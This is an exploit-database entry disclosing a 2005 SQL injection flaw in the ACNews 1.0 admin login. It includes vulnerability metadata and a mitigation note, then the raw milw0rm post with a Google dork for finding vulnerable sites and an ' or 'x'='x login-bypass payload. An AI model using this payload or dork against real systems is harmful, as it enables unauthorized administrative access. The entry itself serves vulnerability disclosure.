header-logo
Suggest Exploit
vendor:
ACNews
by:
LaMeR
5.5
CVSS
MEDIUM
SQL injection
89
CWE
Product Name: ACNews
Affected Version From: ACNews 1.0
Affected Version To: ACNews 1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2005

ACNews 1.0 SQL Injection

The ACNews 1.0 application is vulnerable to SQL injection. An attacker can exploit this vulnerability by logging in with a malicious username and password combination.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# http://www.google.com/search?hl=en&lr=&q=acnews+1.0+login.asp&btnG=Search
# /str0ke

Product:ACNews
version :1.0
VULNERABILITY CLASS: SQL injection

[exploit]
Log in with
username:' or 'x'='x
password :' or 'x'='x
from admin/login.asp page.

greetz to HaXoR & LOverboy

auther : LaMeR

securitygurus team

# milw0rm.com [2005-04-09]

Navigation

Suggest Exploit

Services By CQR